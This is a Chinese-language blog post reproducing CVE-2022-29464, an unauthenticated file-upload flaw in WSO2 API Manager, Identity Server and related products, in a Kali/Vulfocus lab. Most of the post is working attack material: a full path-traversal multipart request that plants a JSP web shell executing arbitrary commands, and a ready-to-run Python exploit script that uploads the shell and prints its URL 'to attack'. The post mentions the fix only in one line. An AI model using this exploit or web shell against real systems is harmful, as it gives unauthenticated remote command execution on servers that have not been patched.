CVE-2022-29464 WSO2文件上传漏洞

一、漏洞概述

WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。

 

二、影响版本

 

  • WSO2 API Manager 2.2.0 及更高版本到 4.0.0
  • WSO2 Identity Server 5.2.0 及以上至 5.11.0
  • WSO2 身份服务器分析 5.4.0、5.4.1、5.5.0 和 5.6.0
  • WSO2 身份服务器作为密钥管理器 5.3.0 及更高版本至 5.10.0
  • WSO2 Enterprise Integrator 6.2.0 及更高版本至 6.6.0

 

 

三、漏洞原理

  WSO2的配置文件 WSO2AM_Home\repository\conf\identity\identity.xml中,修饰 /fileupload(.*) 接口的 secured 属性为 false,这就意味着路由资源访问可以不需要身份验证,从而可以通过构造恶意的post请求包达到恶意jsp文件上传的目的。详情大佬文章点这里~

 

四、漏洞复现环境

Kali Linux + Vulfocus
渗透机:Kali Linux 
靶机:Vulfocus

 

五、实验步骤

1.开启镜像环境,访问WSO2 https://ip:port/carbon/admin/login.jsp

2.抓包且构造漏洞利用的请求包,回应包中出现如下数字即上传文件成功(此处上传的是wavesky.jsp)

 1 POST /fileupload/toolsAny  HTTP/1.1
 2 Host: 192.168.117.131:16630
 3 Accept: */*
 4 Accept-Encoding: gzip, deflate
 5 Content-Length: 905
 6 Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
 7 User-Agent: python-requests/2.22.0
 8 
 9 
10 --4ef9f369a86bfaadf5ec3177278d49c0
11 Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp"
12 
13 <FORM>
14     <INPUT name='cmd' type=text>
15     <INPUT type=submit value='Run'>
16 </FORM>
17 <%@ page import="java.io.*" %>
18     <%
19     String cmd = request.getParameter("cmd");
20     String output = "";
21     if(cmd != null) {
22         String s = null;
23         try {
24             Process p = Runtime.getRuntime().exec(cmd,null,null);
25             BufferedReader sI = new BufferedReader(new
26 InputStreamReader(p.getInputStream()));
27             while((s = sI.readLine()) != null) { output += s+"</br>"; }
28         }  catch(IOException e) {   e.printStackTrace();   }
29     }
30 %>
31         <pre><%=output %></pre>
32 --4ef9f369a86bfaadf5ec3177278d49c0--
 

 3.接下来就可以执行linux命令查看内部配置了

 

六、修复方式

更新至安全版本——https://github.com/wso2/product-apim/releases

 

七、Poc

import requests
import argparse

def exploit(url):
    uurl = "https://"+url+"/fileupload/toolsAny"
    shell = """<FORM>
        <INPUT name='cmd' type=text>
        <INPUT type=submit value='Run'>
    </FORM>
    <%@ page import="java.io.*" %>
        <%
        String cmd = request.getParameter("cmd");
        String output = "";
        if(cmd != null) {
            String s = null;
            try {
                Process p = Runtime.getRuntime().exec(cmd,null,null);
                BufferedReader sI = new BufferedReader(new
    InputStreamReader(p.getInputStream()));
                while((s = sI.readLine()) != null) { output += s+"</br>"; }
            }  catch(IOException e) {   e.printStackTrace();   }
        }
    %>
            <pre><%=output %></pre>"""

    files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/wavesky.jsp": shell}
    response = requests.post(url=uurl,files=files,verify=False)
    if(response.status_code == 200):
        print('It looks likely vulnerable')
        print('Please use this url:'+'{\33[91m'+'https://'+url+'/authenticationendpoint/wavesky.jsp'+'\33[0m}'+' to view and attack~')
    else:
        print('It is strong')

if __name__ == '__main__':
    parameter = argparse.ArgumentParser(description='Poc CVE-2022-29464:')
    parameter.add_argument('--file',help='url file',required=False)
    parameter.add_argument('--url',help='ip:port',required=False)
    para = parameter.parse_args()

    if para.url:
        exploit(para.url)
        exit()
    else:
        parameter.print_help()

Github——https://github.com/wave-to/Poc/blob/main/FileUpload/CVE-2022-29464.py
posted @ 2022-07-23 18:00  wavesky  阅读(1870)  评论(0编辑  收藏  举报